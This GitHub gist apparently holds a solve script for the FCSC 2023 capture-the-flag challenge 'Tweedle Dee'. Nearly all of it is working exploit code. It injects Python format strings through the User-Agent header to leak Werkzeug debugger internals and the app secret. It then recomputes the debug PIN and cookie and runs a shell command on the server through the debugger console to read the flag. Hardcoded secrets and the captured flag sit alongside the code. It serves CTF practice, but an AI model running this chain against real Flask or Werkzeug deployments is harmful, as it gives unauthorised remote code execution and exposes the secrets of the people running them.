Created
June 4, 2023 09:15
-
-
Save maple3142/23078f50f1e0335e94a75a78722fd640 to your computer and use it in GitHub Desktop.
FCSC 2023 - Tweedle Dee
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| from bs4 import BeautifulSoup | |
| import hashlib | |
| from itertools import chain | |
| import os, re, time | |
| rand = os.urandom(4).hex() | |
| # remote have some really funky caching and multiple instances... | |
| host = "https://tweedle-dee.france-cybersecurity-challenge.fr/" | |
| # host = "http://localhost:2201/" | |
| el = BeautifulSoup( | |
| requests.get( | |
| host, | |
| params={"r": rand}, | |
| headers={ | |
| "User-Agent": "{ua.__init__.__globals__[t].sys.modules[threading]._active}" | |
| }, | |
| ).text, | |
| "html.parser", | |
| ).select_one("#bubble") | |
| thread_id = re.findall(r"\d{3,}", el.text.split("serve_forever")[0])[-1] | |
| print(thread_id) | |
| el = BeautifulSoup( | |
| requests.get( | |
| host, | |
| params={"r": rand}, | |
| headers={ | |
| "User-Agent": "{ua.__init__.__globals__[t].sys.modules[threading]._active[%s]._target.__self__.app.secret}" | |
| % thread_id | |
| }, | |
| ).text, | |
| "html.parser", | |
| ).select_one("#bubble") | |
| secret = el.text.split("Hello ")[1] | |
| print(secret) | |
| el = BeautifulSoup( | |
| requests.get( | |
| host, | |
| params={"r": rand}, | |
| headers={ | |
| "User-Agent": "{ua.__init__.__globals__[t].sys.modules[threading]._active[%s]._target.__self__.app.frames}" | |
| % thread_id | |
| }, | |
| ).text, | |
| "html.parser", | |
| ).select_one("#bubble") | |
| frame_id = el.text.split("Hello {")[1].split(":")[0] | |
| print(frame_id) | |
| el = BeautifulSoup( | |
| requests.get( | |
| host, | |
| params={"r": rand}, | |
| headers={ | |
| "User-Agent": "{ua.__init__.__globals__[t].sys.modules[werkzeug.debug]._machine_id}" | |
| }, | |
| ).text, | |
| "html.parser", | |
| ).select_one("#bubble") | |
| machine_id = el.text.split("b'")[1].split("'")[0] | |
| el = BeautifulSoup( | |
| requests.get( | |
| host, | |
| params={"r": rand}, | |
| headers={"User-Agent": "{ua.__init__.__globals__[t].sys.modules[uuid]._node}"}, | |
| ).text, | |
| "html.parser", | |
| ).select_one("#bubble") | |
| node_id = el.text.split("Hello ")[1] | |
| print(node_id, machine_id) | |
| private_bits = [node_id, machine_id] | |
| probably_public_bits = [ | |
| "guest", | |
| "flask.app", | |
| "Flask", | |
| "/usr/local/lib/python3.10/site-packages/flask/app.py", | |
| ] | |
| h = hashlib.sha1() | |
| for bit in chain(probably_public_bits, private_bits): | |
| if not bit: | |
| continue | |
| if isinstance(bit, str): | |
| bit = bit.encode("utf-8") | |
| h.update(bit) | |
| h.update(b"cookiesalt") | |
| cookie_name = f"__wzd{h.hexdigest()[:20]}" | |
| h.update(b"pinsalt") | |
| num = f"{int(h.hexdigest(), 16):09d}"[:9] | |
| for group_size in 5, 4, 3: | |
| if len(num) % group_size == 0: | |
| rv = "-".join( | |
| num[x : x + group_size].rjust(group_size, "0") | |
| for x in range(0, len(num), group_size) | |
| ) | |
| break | |
| else: | |
| rv = num | |
| print(cookie_name) | |
| print(rv) | |
| def hash_pin(pin: str) -> str: | |
| return hashlib.sha1(f"{pin} added salt".encode("utf-8", "replace")).hexdigest()[:12] | |
| cookie_name = "__wzd6e6f57a5f054fef45d76" | |
| rv = "840-396-786" | |
| secret = "8uERxYCjtpHmdKO6qHPO" | |
| for _ in range(10): | |
| r = requests.get( | |
| host + "/", | |
| params={ | |
| "__debugger__": "yes", | |
| "cmd": "import os;os.popen('cat /app/flag*').read()", | |
| "s": secret, | |
| "frm": frame_id, | |
| }, | |
| cookies={ | |
| cookie_name: f"{int(time.time())}|{hash_pin(rv)}", | |
| }, | |
| ) | |
| print(r.text) | |
| # FCSC{2c149fdce9b3db514fa6adf094121999fea5c38fbb3370350d90925238499cf2} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment